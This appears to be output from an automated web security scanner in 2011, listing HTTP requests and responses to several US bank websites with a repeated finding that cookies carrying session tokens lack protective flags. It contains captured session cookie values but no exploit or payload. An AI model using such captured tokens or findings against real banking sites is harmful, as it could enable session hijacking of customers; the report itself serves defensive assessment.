GET /retirementcenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/Search.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Location: https://www6.bankofamerica.com/search/Search.do Content-language: en-US Set-cookie: JSESSIONID=0000d7-ksy874kdblG0_pEKtKn2:13ihk3qeh; Path=/ Set-cookie: INTL_LANG=en_US Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/sitemap/index.jsp Content-language: en-US Set-cookie: JSESSIONID=0000AHYKHX5RDNXbJ74F_kN_fGy:12qb4k2ev; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:13 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:29 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00001dmfVt102GWARUceA1dBtn0:12qb4k7c1; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:28 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MilitaryLendingProgram HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Thu, 03 Feb 2011 01:06:32 GMT Content-type: text/html CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ccpmweb/chf/document/militarylendingrogram.html Set-Cookie: DCTMSESSION=pWqKNJ1Yv9NlgJ9kghvXKyZLpQVVXTgYyKD5x51HXqvvslJM3G4x!-661114096; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.chase.com/ccpmweb/chf/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccp/index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=JWTFNJXGmZr1X2nwQZHwnnLjtkzTGpQJ5DHvfJ94f6GFQqG4Qgyv!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chf/mortgage/om_chasecom_redirect HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:35 GMT Content-length: 959 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/ Connection: close
<html LANG="EN" > <head> <META NAME="robots" CONTENT="index,follow"/> <title >Chase</title> </head> <body><script language="JavaScript"> var s_pageName="Homeownership Center - Obama March 4th - chase ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skeletons/psmgenskel HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=TGFhNJXG71xk8S9N20Cn9bvPGH9yrm34fvpzv4HJ4vS1Qd9YSb6M!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=m6CMNJXFZC8PjQQGMf6sxvPhwgmTfjK0RYFv4QFJyyLQsBjXGn1m!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin/images HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=6g6NNJXFxLM7k3X2S2lR1bkgB1YqhbvphnpHhSMxkgVP6SXmGTFQ!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=jfkfNJXCyH5XHZVYYRdMBh3DlcZvv0J0RGw0MtqzPlxX9TQR6Xvp!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/logon/on_successful_logon.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: http://www.chase.com/cm/cs?urlname=shared/crb/page/notfound.jsp Set-Cookie: DCTMSESSION=NKdvNJXCtfpNBvzYPBCnfP7wBLN2Mt3mCwB2QVmpcRW091j5sTGT!-1658401948; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <bo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/cards/index.jsp HTTP/1.1 Host: www.citibank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:16:55 GMT Content-length: 854 Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=GlQxNJXX9hjkzSqQqQWNphxfGRm78JMp2dwJ21YKmvTyYW6xpK69!-455328445; path=/ Connection: close
<html> <head> <title>Citi Credit Cards | Choose from a variety of Rewards Credit Cards, Student Credit Cards, Small Business Credit Cards, and Value Credit Cards.</title> <meta name="keywords" co ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LaunchPad/dflt/Login.pncadv HTTP/1.1 Host: www.esp01.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:18:09 GMT Server: Apache Set-Cookie: JSESSIONID=0001MlXU1BY2vtyfBtHvrPCXhsj:pr-rdc678-61015gis-a/espts-ethasp8; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 7069
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"> <HEAD> <TI ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/ForgotUserIdServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/OnlineBankingServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>PNC Bank Online Banking</title> <meta http-equiv="Expires" content=" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/Forms.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Blank.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Gateway.do?siteArea=/pnccorp/PNC/Home HTTP/1.1 Host: www.pnc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993
PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 23:45:33 GMT; Path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Homepage.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/NCProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Solutions.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/depositRates/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/homeEquity/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.retirementgold.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 156 Content-Type: text/html Location: https://www.retirementgold.com/fnbo Set-Cookie: ASPSESSIONIDAAQSTCQQ=GLLJBHGAIDPLDGIHHBMDKOAH; path=/ Date: Wed, 02 Feb 2011 22:20:27 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://www.retirementgold.com/fnbo">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7828 Set-Cookie: JSESSIONIDRIB09=0000FrNgyz_FdPFwsTt_iMc_-lN:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1 Host: www4.usbank.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:00:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7829 Set-Cookie: JSESSIONIDRIB011=0000QfeDKqBzExihl0t6Sl1rbNV:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14681 Set-Cookie: JSESSIONIDRIB09=0000K4E52Qoy6PbGS6Z06RA5tSI:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14682 Set-Cookie: JSESSIONIDRIB011=0000ggpvqAphewOgNOFlO8lrK0H:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14538 Set-Cookie: JSESSIONIDRIB011=0000AgcxpIllPHFlV7I1C0_htWM:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
